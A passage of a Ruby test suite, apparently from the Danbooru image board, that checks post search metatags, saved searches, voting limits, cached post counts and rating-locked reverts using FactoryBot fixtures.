      should "call Tag.increment_post_counts with the correct params" do
        # The :post factory's default tag string yields exactly these tags.
        Tag.expects(:increment_post_counts).once.with(["tag1", "tag2"])
        @post.save
      end
    end

    should "increment the uploaders post_upload_count" do
      assert_difference(-> { CurrentUser.user.post_upload_count }) do
        # Created purely for its side effect on the uploader's counter.
        FactoryBot.create(:post, uploader: CurrentUser.user)
        CurrentUser.user.reload
      end
    end
  end
end
context "Searching:" do
setup do
  # Pool archive callbacks would otherwise reach an external service.
  mock_pool_archive_service!
end
should "return posts for the age:<1minute tag" do
  # A freshly created post is always younger than one minute.
  post = FactoryBot.create(:post)
  assert_tag_match([post], "age:<1minute")
end
should "return posts for the age:<1minute tag when the user is in Pacific time zone" do
  # Age searches must be correct regardless of the viewer's time zone.
  post = FactoryBot.create(:post)
  Time.zone = "Pacific Time (US & Canada)"
  begin
    assert_tag_match([post], "age:<1minute")
  ensure
    # Restore the default test time zone even if the assertion fails, so a
    # failure here cannot leak zone state into later tests.
    Time.zone = "Eastern Time (US & Canada)"
  end
end
should "return posts for the age:<1minute tag when the user is in Tokyo time zone" do
  # Age searches must be correct regardless of the viewer's time zone.
  post = FactoryBot.create(:post)
  Time.zone = "Asia/Tokyo"
  begin
    assert_tag_match([post], "age:<1minute")
  ensure
    # Restore the default test time zone even if the assertion fails, so a
    # failure here cannot leak zone state into later tests.
    Time.zone = "Eastern Time (US & Canada)"
  end
end
# Single-character punctuation tags must be searchable verbatim. In each
# test the second post exists only to prove it is NOT matched.
should "return posts for the ' tag" do
  post1 = FactoryBot.create(:post, :tag_string => "'")
  post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
  assert_tag_match([post1], "'")
end

should "return posts for the \\ tag" do
  post1 = FactoryBot.create(:post, :tag_string => "\\")
  post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
  assert_tag_match([post1], "\\")
end

should "return posts for the ( tag" do
  post1 = FactoryBot.create(:post, :tag_string => "(")
  post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
  assert_tag_match([post1], "(")
end

should "return posts for the ? tag" do
  post1 = FactoryBot.create(:post, :tag_string => "?")
  post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
  assert_tag_match([post1], "?")
end
# Basic tag combination semantics. assert_tag_match expects results in the
# given order (newest post first).
should "return posts for 1 tag" do
  post1 = FactoryBot.create(:post, :tag_string => "aaa")
  post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
  post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")

  assert_tag_match([post2, post1], "aaa")
end

should "return posts for a 2 tag join" do
  post1 = FactoryBot.create(:post, :tag_string => "aaa")
  post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
  post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")

  assert_tag_match([post2], "aaa bbb")
end

should "return posts for a 2 tag union" do
  # "~" marks each tag as part of an OR group; "aaab" must not match "~aaa".
  post1 = FactoryBot.create(:post, :tag_string => "aaa")
  post2 = FactoryBot.create(:post, :tag_string => "aaab bbb")
  post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")

  assert_tag_match([post3, post1], "~aaa ~ccc")
end

should "return posts for 1 tag with exclusion" do
  post1 = FactoryBot.create(:post, :tag_string => "aaa")
  post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
  post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")

  assert_tag_match([post1], "aaa -bbb")
end

should "return posts for 1 tag with a pattern" do
  # "a*" is a wildcard over tag names, matching both "aaa" and "aaab".
  post1 = FactoryBot.create(:post, :tag_string => "aaa")
  post2 = FactoryBot.create(:post, :tag_string => "aaab bbb")
  post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")

  assert_tag_match([post2, post1], "a*")
end

should "return posts for 2 tags, one with a pattern" do
  post1 = FactoryBot.create(:post, :tag_string => "aaa")
  post2 = FactoryBot.create(:post, :tag_string => "aaab bbb")
  post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")

  assert_tag_match([post2], "a* bbb")
end
should "return posts for the id:<N> metatag" do
  posts = FactoryBot.create_list(:post, 3)

  assert_tag_match([posts[1]], "id:#{posts[1].id}")
  assert_tag_match([posts[2]], "id:>#{posts[1].id}")
  assert_tag_match([posts[0]], "id:<#{posts[1].id}")

  assert_tag_match([posts[2], posts[0]], "-id:#{posts[1].id}")
  assert_tag_match([posts[2], posts[1]], "id:>=#{posts[1].id}")
  assert_tag_match([posts[1], posts[0]], "id:<=#{posts[1].id}")

  # Comma-separated lists and ".." ranges are also supported.
  assert_tag_match([posts[2], posts[0]], "id:#{posts[0].id},#{posts[2].id}")
  assert_tag_match(posts.reverse, "id:#{posts[0].id}..#{posts[2].id}")
end

should "return posts for the fav:<name> metatag" do
  users = FactoryBot.create_list(:user, 2)
  # Each user favorites their own post via the "fav:" pseudo-tag.
  posts = users.map do |u|
    CurrentUser.scoped(u) { FactoryBot.create(:post, tag_string: "fav:#{u.name}") }
  end

  assert_tag_match([posts[0]], "fav:#{users[0].name}")
  assert_tag_match([posts[1]], "-fav:#{users[0].name}")
end

should "return posts for the ordfav:<name> metatag" do
  post1 = FactoryBot.create(:post, tag_string: "fav:#{CurrentUser.name}")
  post2 = FactoryBot.create(:post, tag_string: "fav:#{CurrentUser.name}")

  # NOTE(review): expected order matches most-recently-favorited first
  # (which here coincides with id order) — confirm against ordfav semantics.
  assert_tag_match([post2, post1], "ordfav:#{CurrentUser.name}")
end
should "return posts for the pool:<name> metatag" do
  SqsService.any_instance.stubs(:send_message)

  pool1 = create(:pool, name: "test_a", category: "series")
  pool2 = create(:pool, name: "test_b", category: "collection")
  post1 = create(:post, tag_string: "pool:test_a")
  post2 = create(:post, tag_string: "pool:test_b")

  # Pools can be searched by id or by (case-insensitive) name.
  assert_tag_match([post1], "pool:#{pool1.id}")
  assert_tag_match([post2], "pool:#{pool2.id}")

  assert_tag_match([post1], "pool:TEST_A")
  assert_tag_match([post2], "pool:Test_B")

  assert_tag_match([post1], "pool:test_a")
  assert_tag_match([post2], "-pool:test_a")

  assert_tag_match([], "pool:test_a pool:test_b")
  assert_tag_match([], "-pool:test_a -pool:test_b")

  # Wildcards plus the special values any/none, and category names.
  assert_tag_match([post2, post1], "pool:test*")

  assert_tag_match([post2, post1], "pool:any")
  assert_tag_match([post2, post1], "-pool:none")
  assert_tag_match([], "-pool:any")
  assert_tag_match([], "pool:none")

  assert_tag_match([post1], "pool:series")
  assert_tag_match([post2], "-pool:series")
  assert_tag_match([post2], "pool:collection")
  assert_tag_match([post1], "-pool:collection")
end

should "return posts for the ordpool:<name> metatag" do
  # "newpool:" creates the pool with the first post; the second post is
  # appended to it, so ordpool returns them in pool order.
  posts = FactoryBot.create_list(:post, 2, tag_string: "newpool:test")

  assert_tag_match(posts, "ordpool:test")
end

should "return posts for the ordpool:<name> metatag for a series pool containing duplicate posts" do
  # Duplicated post ids in a series pool appear once per occurrence.
  posts = FactoryBot.create_list(:post, 2)
  pool = FactoryBot.create(:pool, name: "test", category: "series", post_ids: [posts[0].id, posts[1].id, posts[1].id])

  assert_tag_match([posts[0], posts[1], posts[1]], "ordpool:test")
end
should "return posts for the parent:<N> metatag" do
  parent = FactoryBot.create(:post)
  child = FactoryBot.create(:post, tag_string: "parent:#{parent.id}")

  assert_tag_match([parent], "parent:none")
  assert_tag_match([child], "-parent:none")
  # parent:<id> matches the parent itself as well as its children.
  assert_tag_match([child, parent], "parent:#{parent.id}")
  assert_tag_match([child], "parent:#{child.id}")

  assert_tag_match([child], "child:none")
  assert_tag_match([parent], "child:any")
end

should "return posts for the favgroup:<name> metatag" do
  favgroups = FactoryBot.create_list(:favorite_group, 2, creator: CurrentUser.user)
  posts = favgroups.map { |g| FactoryBot.create(:post, tag_string: "favgroup:#{g.name}") }

  assert_tag_match([posts[0]], "favgroup:#{favgroups[0].name}")
  assert_tag_match([posts[1]], "-favgroup:#{favgroups[0].name}")
  assert_tag_match([], "-favgroup:#{favgroups[0].name} -favgroup:#{favgroups[1].name}")
end
should "return posts for the user:<name> metatag" do
  users = FactoryBot.create_list(:user, 2)
  posts = users.map { |u| FactoryBot.create(:post, uploader: u) }

  assert_tag_match([posts[0]], "user:#{users[0].name}")
  assert_tag_match([posts[1]], "-user:#{users[0].name}")
end

should "return posts for the approver:<name> metatag" do
  users = FactoryBot.create_list(:user, 2)
  posts = users.map { |u| FactoryBot.create(:post, approver: u) }
  posts << FactoryBot.create(:post, approver: nil)

  assert_tag_match([posts[0]], "approver:#{users[0].name}")
  assert_tag_match([posts[1]], "-approver:#{users[0].name}")
  assert_tag_match([posts[1], posts[0]], "approver:any")
  assert_tag_match([posts[2]], "approver:none")
end

should "return posts for the commenter:<name> metatag" do
  # Users are backdated so they're old enough to comment.
  users = FactoryBot.create_list(:user, 2, created_at: 2.weeks.ago)
  posts = FactoryBot.create_list(:post, 2)
  comms = users.zip(posts).map { |u, p| as(u) { FactoryBot.create(:comment, creator: u, post: p) } }

  assert_tag_match([posts[0]], "commenter:#{users[0].name}")
  assert_tag_match([posts[1]], "commenter:#{users[1].name}")
end

should "return posts for the commenter:<any|none> metatag" do
  # Deleted comments don't count towards commenter:any.
  posts = FactoryBot.create_list(:post, 2)
  create(:comment, creator: create(:user, created_at: 2.weeks.ago), post: posts[0], is_deleted: false)
  create(:comment, creator: create(:user, created_at: 2.weeks.ago), post: posts[1], is_deleted: true)

  assert_tag_match([posts[0]], "commenter:any")
  assert_tag_match([posts[1]], "commenter:none")
end

should "return posts for the noter:<name> metatag" do
  users = FactoryBot.create_list(:user, 2)
  posts = FactoryBot.create_list(:post, 2)
  notes = users.zip(posts).map { |u, p| FactoryBot.create(:note, creator: u, post: p) }

  assert_tag_match([posts[0]], "noter:#{users[0].name}")
  assert_tag_match([posts[1]], "noter:#{users[1].name}")
end

should "return posts for the noter:<any|none> metatag" do
  # Inactive (deleted) notes don't count towards noter:any.
  posts = FactoryBot.create_list(:post, 2)
  FactoryBot.create(:note, post: posts[0], is_active: true)
  FactoryBot.create(:note, post: posts[1], is_active: false)

  assert_tag_match([posts[0]], "noter:any")
  assert_tag_match([posts[1]], "noter:none")
end

should "return posts for the note_count:<N> metatag" do
  # note_count/notes count all notes; the active_/deleted_ variants filter
  # by the note's is_active flag.
  posts = FactoryBot.create_list(:post, 3)
  FactoryBot.create(:note, post: posts[0], is_active: true)
  FactoryBot.create(:note, post: posts[1], is_active: false)

  assert_tag_match([posts[1], posts[0]], "note_count:1")
  assert_tag_match([posts[0]], "active_note_count:1")
  assert_tag_match([posts[1]], "deleted_note_count:1")

  assert_tag_match([posts[1], posts[0]], "notes:1")
  assert_tag_match([posts[0]], "active_notes:1")
  assert_tag_match([posts[1]], "deleted_notes:1")
end

should "return posts for the artcomm:<name> metatag" do
  users = FactoryBot.create_list(:user, 2)
  posts = FactoryBot.create_list(:post, 2)
  users.zip(posts).map do |u, p|
    CurrentUser.scoped(u) { FactoryBot.create(:artist_commentary, post: p) }
  end

  assert_tag_match([posts[0]], "artcomm:#{users[0].name}")
  assert_tag_match([posts[1]], "artcomm:#{users[1].name}")
end
should "return posts for the date:<d> metatag" do
  post = FactoryBot.create(:post, created_at: Time.parse("2017-01-01 12:00"))

  assert_tag_match([post], "date:2017-01-01")
end

should "return posts for the age:<n> metatag" do
  # All supported unit suffixes: s(econds), mi(nutes), h(ours), d(ays),
  # w(eeks), mo(nths), y(ears); bare numbers are seconds.
  post = FactoryBot.create(:post)

  assert_tag_match([post], "age:<60")
  assert_tag_match([post], "age:<60s")
  assert_tag_match([post], "age:<1mi")
  assert_tag_match([post], "age:<1h")
  assert_tag_match([post], "age:<1d")
  assert_tag_match([post], "age:<1w")
  assert_tag_match([post], "age:<1mo")
  assert_tag_match([post], "age:<1y")
end

should "return posts for the ratio:<x:y> metatag" do
  # Ratio accepts both "w:h" and decimal forms.
  post = FactoryBot.create(:post, image_width: 1000, image_height: 500)

  assert_tag_match([post], "ratio:2:1")
  assert_tag_match([post], "ratio:2.0")
end

should "return posts for the status:<type> metatag" do
  pending = FactoryBot.create(:post, is_pending: true)
  flagged = FactoryBot.create(:post, is_flagged: true)
  deleted = FactoryBot.create(:post, is_deleted: true)
  banned  = FactoryBot.create(:post, is_banned: true)
  all = [banned, deleted, flagged, pending]

  assert_tag_match([flagged, pending], "status:modqueue")
  assert_tag_match([pending], "status:pending")
  assert_tag_match([flagged], "status:flagged")
  assert_tag_match([deleted], "status:deleted")
  assert_tag_match([banned],  "status:banned")
  # None of the fixtures above are active.
  assert_tag_match([], "status:active")
  assert_tag_match(all, "status:any")
  assert_tag_match(all, "status:all")

  assert_tag_match(all - [flagged, pending], "-status:modqueue")
  assert_tag_match(all - [pending], "-status:pending")
  assert_tag_match(all - [flagged], "-status:flagged")
  assert_tag_match(all - [deleted], "-status:deleted")
  assert_tag_match(all - [banned],  "-status:banned")
  assert_tag_match(all, "-status:active")
end

should "return posts for the status:unmoderated metatag" do
  # A pending post with a disapproval is excluded from the unmoderated queue.
  flagged = FactoryBot.create(:post, is_flagged: true)
  pending = FactoryBot.create(:post, is_pending: true)
  disapproved = FactoryBot.create(:post, is_pending: true)

  create(:post_flag, post: flagged, creator: create(:user, created_at: 2.weeks.ago))
  FactoryBot.create(:post_disapproval, post: disapproved, reason: "disinterest")

  assert_tag_match([pending, flagged], "status:unmoderated")
end

should "respect the 'Deleted post filter' option when using the status:banned metatag" do
  deleted = FactoryBot.create(:post, is_deleted: true, is_banned: true)
  undeleted = FactoryBot.create(:post, is_banned: true)

  CurrentUser.hide_deleted_posts = true
  assert_tag_match([undeleted], "status:banned")

  CurrentUser.hide_deleted_posts = false
  assert_tag_match([undeleted, deleted], "status:banned")
end

should "return posts for the filetype:<ext> metatag" do
  png = FactoryBot.create(:post, file_ext: "png")
  jpg = FactoryBot.create(:post, file_ext: "jpg")

  assert_tag_match([png], "filetype:png")
  assert_tag_match([jpg], "-filetype:png")
end

should "return posts for the tagcount:<n> metatags" do
  # tagcount counts all tags; the per-category variants count one category.
  post = FactoryBot.create(:post, tag_string: "artist:wokada copyright:vocaloid char:hatsune_miku twintails")

  assert_tag_match([post], "tagcount:4")
  assert_tag_match([post], "arttags:1")
  assert_tag_match([post], "copytags:1")
  assert_tag_match([post], "chartags:1")
  assert_tag_match([post], "gentags:1")
end
should "return posts for the md5:<md5> metatag" do
  post1 = FactoryBot.create(:post, :md5 => "abcd")
  post2 = FactoryBot.create(:post)

  assert_tag_match([post1], "md5:abcd")
end

should "return posts for a source search" do
  # source: does a prefix match; source:none matches blank sources.
  post1 = FactoryBot.create(:post, :source => "abcd")
  post2 = FactoryBot.create(:post, :source => "abcdefg")
  post3 = FactoryBot.create(:post, :source => "")

  assert_tag_match([post2], "source:abcde")
  assert_tag_match([post3, post1], "-source:abcde")

  assert_tag_match([post3], "source:none")
  assert_tag_match([post2, post1], "-source:none")
end

should "return posts for a case insensitive source search" do
  post1 = FactoryBot.create(:post, :source => "ABCD")
  post2 = FactoryBot.create(:post, :source => "1234")

  assert_tag_match([post1], "source:abcd")
end

should "return posts for a pixiv source search" do
  # Wildcard source searches, with and without an explicit scheme.
  url = "http://i1.pixiv.net/img123/img/artist-name/789.png"
  post = FactoryBot.create(:post, :source => url)

  assert_tag_match([post], "source:*.pixiv.net/img*/artist-name/*")
  assert_tag_match([],     "source:*.pixiv.net/img*/artist-fake/*")
  assert_tag_match([post], "source:http://*.pixiv.net/img*/img/artist-name/*")
  assert_tag_match([],     "source:http://*.pixiv.net/img*/img/artist-fake/*")
end

# The pixiv_id is extracted from several historical pixiv URL layouts.
should "return posts for a pixiv id search (type 1)" do
  url = "http://i1.pixiv.net/img-inf/img/2013/03/14/03/02/36/34228050_s.jpg"
  post = FactoryBot.create(:post, :source => url)
  assert_tag_match([post], "pixiv_id:34228050")
end

should "return posts for a pixiv id search (type 2)" do
  url = "http://i1.pixiv.net/img123/img/artist-name/789.png"
  post = FactoryBot.create(:post, :source => url)
  assert_tag_match([post], "pixiv_id:789")
end

should "return posts for a pixiv id search (type 3)" do
  url = "http://www.pixiv.net/member_illust.php?mode=manga_big&illust_id=19113635&page=0"
  post = FactoryBot.create(:post, :source => url)
  assert_tag_match([post], "pixiv_id:19113635")
end

should "return posts for a pixiv id search (type 4)" do
  url = "http://i2.pixiv.net/img70/img/disappearedstump/34551381_p3.jpg?1364424318"
  post = FactoryBot.create(:post, :source => url)
  assert_tag_match([post], "pixiv_id:34551381")
end

should "return posts for a pixiv_id:any search" do
  url = "http://i1.pixiv.net/img-original/img/2014/10/02/13/51/23/46304396_p0.png"
  post = FactoryBot.create(:post, source: url)
  assert_tag_match([post], "pixiv_id:any")
end

should "return posts for a pixiv_id:none search" do
  post = FactoryBot.create(:post)
  assert_tag_match([post], "pixiv_id:none")
end
context "saved searches" do
  setup do
    @post1 = FactoryBot.create(:post, tag_string: "aaa")
    @post2 = FactoryBot.create(:post, tag_string: "bbb")
    FactoryBot.create(:saved_search, query: "aaa", labels: ["zzz"], user: CurrentUser.user)
    FactoryBot.create(:saved_search, query: "bbb", user: CurrentUser.user)
  end

  context "labeled" do
    should "work" do
      # search:<label> resolves through SavedSearch.post_ids_for.
      SavedSearch.expects(:post_ids_for).with(CurrentUser.id, label: "zzz").returns([@post1.id])
      assert_tag_match([@post1], "search:zzz")
    end
  end

  context "missing" do
    should "work" do
      # Searches without a label fall under the "uncategorized" pseudo-label.
      SavedSearch.expects(:post_ids_for).with(CurrentUser.id, label: "uncategorized").returns([@post2.id])
      assert_tag_match([@post2], "search:uncategorized")
    end
  end

  context "all" do
    should "work" do
      SavedSearch.expects(:post_ids_for).with(CurrentUser.id).returns([@post1.id, @post2.id])
      assert_tag_match([@post2, @post1], "search:all")
    end
  end
end
should "return posts for a rating:<s|q|e> metatag" do
  s = FactoryBot.create(:post, :rating => "s")
  q = FactoryBot.create(:post, :rating => "q")
  e = FactoryBot.create(:post, :rating => "e")
  all = [e, q, s]

  assert_tag_match([s], "rating:s")
  assert_tag_match([q], "rating:q")
  assert_tag_match([e], "rating:e")

  assert_tag_match(all - [s], "-rating:s")
  assert_tag_match(all - [q], "-rating:q")
  assert_tag_match(all - [e], "-rating:e")
end

should "return posts for a locked:<rating|note|status> metatag" do
  rating_locked = FactoryBot.create(:post, is_rating_locked: true)
  note_locked   = FactoryBot.create(:post, is_note_locked: true)
  status_locked = FactoryBot.create(:post, is_status_locked: true)
  all = [status_locked, note_locked, rating_locked]

  assert_tag_match([rating_locked], "locked:rating")
  assert_tag_match([note_locked],   "locked:note")
  assert_tag_match([status_locked], "locked:status")

  assert_tag_match(all - [rating_locked], "-locked:rating")
  assert_tag_match(all - [note_locked],   "-locked:note")
  assert_tag_match(all - [status_locked], "-locked:status")
end

should "return posts for a upvote:<user>, downvote:<user> metatag" do
  # Voting requires privileges, so run as a moderator.
  CurrentUser.scoped(FactoryBot.create(:mod_user)) do
    upvoted   = FactoryBot.create(:post, tag_string: "upvote:self")
    downvoted = FactoryBot.create(:post, tag_string: "downvote:self")

    assert_tag_match([upvoted],   "upvote:#{CurrentUser.name}")
    assert_tag_match([downvoted], "downvote:#{CurrentUser.name}")
  end
end

should "return posts for a disapproval:<type> metatag" do
  CurrentUser.scoped(FactoryBot.create(:mod_user)) do
    pending     = FactoryBot.create(:post, is_pending: true)
    disapproved = FactoryBot.create(:post, is_pending: true)
    disapproval = FactoryBot.create(:post_disapproval, post: disapproved, reason: "disinterest")

    # disapproval accepts none/any as well as a specific reason.
    assert_tag_match([pending],     "disapproval:none")
    assert_tag_match([disapproved], "disapproval:any")
    assert_tag_match([disapproved], "disapproval:disinterest")
    assert_tag_match([],            "disapproval:breaks_rules")

    assert_tag_match([disapproved], "-disapproval:none")
    assert_tag_match([pending],     "-disapproval:any")
    assert_tag_match([pending],     "-disapproval:disinterest")
    assert_tag_match([disapproved, pending], "-disapproval:breaks_rules")
  end
end
should "return posts ordered by a particular attribute" do
posts = (1..2).map do |n|
tags = ["tagme", "gentag1 gentag2 artist:arttag char:chartag copy:copytag"]
p = FactoryBot.create(
:post,
score: n,
fav_count: n,
file_size: 1.megabyte * n,
# posts[0] is portrait, posts[1] is landscape. posts[1].mpixels > posts[0].mpixels.
image_height: 100 * n * n,
image_width: 100 * (3 - n) * n,
tag_string: tags[n - 1]
)
u = create(:user, created_at: 2.weeks.ago)
create(:artist_commentary, post: p)
create(:comment, post: p, creator: u, do_not_bump_post: false)
create(:note, post: p, creator: u)
p
end
FactoryBot.create(:note, post: posts.second)
assert_tag_match(posts.reverse, "order:id_desc")
assert_tag_match(posts.reverse, "order:score")
assert_tag_match(posts.reverse, "order:favcount")
assert_tag_match(posts.reverse, "order:change")
assert_tag_match(posts.reverse, "order:comment")
assert_tag_match(posts.reverse, "order:comment_bumped")
assert_tag_match(posts.reverse, "order:note")
assert_tag_match(posts.reverse, "order:artcomm")
assert_tag_match(posts.reverse, "order:mpixels")
assert_tag_match(posts.reverse, "order:portrait")
assert_tag_match(posts.reverse, "order:filesize")
assert_tag_match(posts.reverse, "order:tagcount")
assert_tag_match(posts.reverse, "order:gentags")
assert_tag_match(posts.reverse, "order:arttags")
assert_tag_match(posts.reverse, "order:chartags")
assert_tag_match(posts.reverse, "order:copytags")
assert_tag_match(posts.reverse, "order:rank")
assert_tag_match(posts.reverse, "order:note_count")
assert_tag_match(posts.reverse, "order:note_count_desc")
assert_tag_match(posts.reverse, "order:notes")
assert_tag_match(posts.reverse, "order:notes_desc")
assert_tag_match(posts, "order:id_asc")
assert_tag_match(posts, "order:score_asc")
assert_tag_match(posts, "order:favcount_asc")
assert_tag_match(posts, "order:change_asc")
assert_tag_match(posts, "order:comment_asc")
assert_tag_match(posts, "order:comment_bumped_asc")
assert_tag_match(posts, "order:artcomm_asc")
assert_tag_match(posts, "order:note_asc")
assert_tag_match(posts, "order:mpixels_asc")
assert_tag_match(posts, "order:landscape")
assert_tag_match(posts, "order:filesize_asc")
assert_tag_match(posts, "order:tagcount_asc")
assert_tag_match(posts, "order:gentags_asc")
assert_tag_match(posts, "order:arttags_asc")
assert_tag_match(posts, "order:chartags_asc")
assert_tag_match(posts, "order:copytags_asc")
assert_tag_match(posts, "order:note_count_asc")
assert_tag_match(posts, "order:notes_asc")
end
should "return posts for order:comment_bumped" do
  post1 = FactoryBot.create(:post)
  post2 = FactoryBot.create(:post)
  post3 = FactoryBot.create(:post)

  user = create(:gold_user)

  as(user) do
    # post2's comment does not bump, so it sorts last by bump time.
    comment1 = create(:comment, creator: user, post: post1)
    comment2 = create(:comment, creator: user, post: post2, do_not_bump_post: true)
    comment3 = create(:comment, creator: user, post: post3)
  end

  assert_tag_match([post3, post1, post2], "order:comment_bumped")
  assert_tag_match([post2, post1, post3], "order:comment_bumped_asc")
end

should "return posts for a filesize search" do
  post = FactoryBot.create(:post, :file_size => 1.megabyte)

  assert_tag_match([post], "filesize:1mb")
  # Non-exact unit forms use fuzzy matching around the given size.
  assert_tag_match([post], "filesize:1000kb")
  assert_tag_match([post], "filesize:1048576b")
end

should "not perform fuzzy matching for an exact filesize search" do
  # A raw byte count (or explicit "b" suffix) must match exactly.
  post = FactoryBot.create(:post, :file_size => 1.megabyte)

  assert_tag_match([], "filesize:1048000b")
  assert_tag_match([], "filesize:1048000")
end
should "resolve aliases to the actual tag" do
  create(:tag_alias, antecedent_name: "kitten", consequent_name: "cat")
  post1 = create(:post, tag_string: "cat")
  post2 = create(:post, tag_string: "dog")

  assert_tag_match([post1], "kitten")
  assert_tag_match([post2], "-kitten")
end

should "fail for more than 6 tags" do
  # NOTE(review): presumably the current user's tag-query limit is 6 here;
  # the query below has 7 terms.
  post1 = FactoryBot.create(:post, :rating => "s")

  assert_raise(::Post::SearchError) do
    Post.tag_match("a b c rating:s width:10 height:10 user:bob")
  end
end

should "not count free tags against the user's search limit" do
  post1 = FactoryBot.create(:post, tag_string: "aaa bbb rating:s")

  # "rating:s" is marked unlimited, so only "aaa" and "bbb" count.
  Danbooru.config.expects(:is_unlimited_tag?).with("rating:s").once.returns(true)
  Danbooru.config.expects(:is_unlimited_tag?).with(anything).twice.returns(false)

  assert_tag_match([post1], "aaa bbb rating:s")
end
should "succeed for exclusive tag searches with no other tag" do
  # Seed one post so the query has data to run against; we only care that
  # building and running a purely-negative search does not raise.
  FactoryBot.create(:post, :rating => "s", :tag_string => "aaa")

  assert_nothing_raised do
    Post.tag_match("-aaa")
  end
end
should "succeed for exclusive tag searches combined with a metatag" do
  # Seed one post so the query has data to run against; we only care that
  # a negative tag combined with a metatag does not raise.
  FactoryBot.create(:post, :rating => "s", :tag_string => "aaa")

  assert_nothing_raised do
    Post.tag_match("-aaa id:>0")
  end
end
end
context "Voting:" do
  context "with a super voter" do
    setup do
      @user = FactoryBot.create(:user)
      FactoryBot.create(:super_voter, user: @user)
      @post = FactoryBot.create(:post)
    end

    should "account for magnitude" do
      CurrentUser.scoped(@user, "127.0.0.1") do
        assert_nothing_raised {@post.vote!("up")}
        assert_raises(PostVote::Error) {@post.vote!("up")}
        @post.reload
        assert_equal(1, PostVote.count)
        # A single super-voter vote counts for SuperVoter::MAGNITUDE points.
        assert_equal(SuperVoter::MAGNITUDE, @post.score)
      end
    end
  end

  should "not allow members to vote" do
    @user = FactoryBot.create(:user)
    @post = FactoryBot.create(:post)
    as_user do
      assert_raises(PostVote::Error) { @post.vote!("up") }
    end
  end

  should "not allow duplicate votes" do
    user = FactoryBot.create(:gold_user)
    post = FactoryBot.create(:post)
    CurrentUser.scoped(user, "127.0.0.1") do
      assert_nothing_raised {post.vote!("up")}
      assert_raises(PostVote::Error) {post.vote!("up")}
      post.reload
      # The failed duplicate vote must not create a record or change score.
      assert_equal(1, PostVote.count)
      assert_equal(1, post.score)
    end
  end

  should "allow undoing of votes" do
    user = FactoryBot.create(:gold_user)
    post = FactoryBot.create(:post)

    # We deliberately don't call post.reload until the end to verify that
    # post.unvote! returns the correct score even when not forcibly reloaded.
    CurrentUser.scoped(user, "127.0.0.1") do
      post.vote!("up")
      assert_equal(1, post.score)

      post.unvote!
      assert_equal(0, post.score)

      assert_nothing_raised {post.vote!("down")}
      assert_equal(-1, post.score)

      post.unvote!
      assert_equal(0, post.score)

      assert_nothing_raised {post.vote!("up")}
      assert_equal(1, post.score)

      post.reload
      assert_equal(1, post.score)
    end
  end
end
context "Counting:" do
context "Creating a post" do
setup do
Danbooru.config.stubs(:blank_tag_search_fast_count).returns(nil)
Danbooru.config.stubs(:estimate_post_counts).returns(false)
FactoryBot.create(:tag_alias, :antecedent_name => "alias", :consequent_name => "aaa")
FactoryBot.create(:post, :tag_string => "aaa", "score" => 42)
end
context "a single basic tag" do
should "return the cached count" do
Tag.find_or_create_by_name("aaa").update_columns(post_count: 100)
assert_equal(100, Post.fast_count("aaa"))
end
end
context "an aliased tag" do
should "return the count of the consequent tag" do
assert_equal(Post.fast_count("aaa"), Post.fast_count("alias"))
end
end
context "a single metatag" do
should "return the correct cached count" do
FactoryBot.build(:tag, name: "score:42", post_count: -100).save(validate: false)
Post.set_count_in_cache("score:42", 100)
assert_equal(100, Post.fast_count("score:42"))
end
should "return the correct cached count for a pool:<id> search" do
FactoryBot.build(:tag, name: "pool:1234", post_count: -100).save(validate: false)
Post.set_count_in_cache("pool:1234", 100)
assert_equal(100, Post.fast_count("pool:1234"))
end
end
context "a multi-tag search" do
should "return the cached count, if it exists" do
Post.set_count_in_cache("aaa score:42", 100)
assert_equal(100, Post.fast_count("aaa score:42"))
end
should "return the true count, if not cached" do
assert_equal(1, Post.fast_count("aaa score:42"))
end
should "set the expiration time" do
Cache.expects(:put).with(Post.count_cache_key("aaa score:42"), 1, 180)
Post.fast_count("aaa score:42")
end
end
context "a blank search" do
should "should execute a search" do
Cache.delete(Post.count_cache_key(''))
Post.expects(:fast_count_search).with("", kind_of(Hash)).once.returns(1)
assert_equal(1, Post.fast_count(""))
end
should "set the value in cache" do
Post.expects(:set_count_in_cache).with("", kind_of(Integer)).once
Post.fast_count("")
end
context "with a primed cache" do
setup do
Cache.put(Post.count_cache_key(''), "100")
end
should "fetch the value from the cache" do
assert_equal(100, Post.fast_count(""))
end
end
should_eventually "translate an alias" do
assert_equal(1, Post.fast_count("alias"))
end
should "return 0 for a nonexisting tag" do
assert_equal(0, Post.fast_count("bbb"))
end
context "in safe mode" do
setup do
CurrentUser.stubs(:safe_mode?).returns(true)
FactoryBot.create(:post, "rating" => "s")
end
should "work for a blank search" do
assert_equal(1, Post.fast_count(""))
end
should "work for a nil search" do
assert_equal(1, Post.fast_count(nil))
end
should "not fail for a two tag search by a member" do
post1 = FactoryBot.create(:post, tag_string: "aaa bbb rating:s")
post2 = FactoryBot.create(:post, tag_string: "aaa bbb rating:e")
Danbooru.config.expects(:is_unlimited_tag?).with("rating:s").once.returns(true)
Danbooru.config.expects(:is_unlimited_tag?).with(anything).twice.returns(false)
assert_equal(1, Post.fast_count("aaa bbb"))
end
should "set the value in cache" do
Post.expects(:set_count_in_cache).with("rating:s", kind_of(Integer)).once
Post.fast_count("")
end
context "with a primed cache" do
setup do
Cache.put(Post.count_cache_key('rating:s'), "100")
end
should "fetch the value from the cache" do
assert_equal(100, Post.fast_count(""))
end
end
end
end
end
end
context "Reverting: " do
context "a post that is rating locked" do
setup do
@post = FactoryBot.create(:post, :rating => "s")
travel(2.hours) do
@post.update(rating: "q", is_rating_locked: true)
end
end
should "not revert the rating" do
assert_raises ActiveRecord::RecordInvalid do
@post.revert_to!(@post.versions.first)
end
assert_equal(["Rating is locked and cannot be changed. Unlock the post first."], @post.errors.full_messages)
assert_equal(@post.versions.last.rating, @post.reload.rating)
end
should "revert the rating after unlocking" do
@post.update(rating: "e", is_rating_locked: false)
assert_nothing_raised do
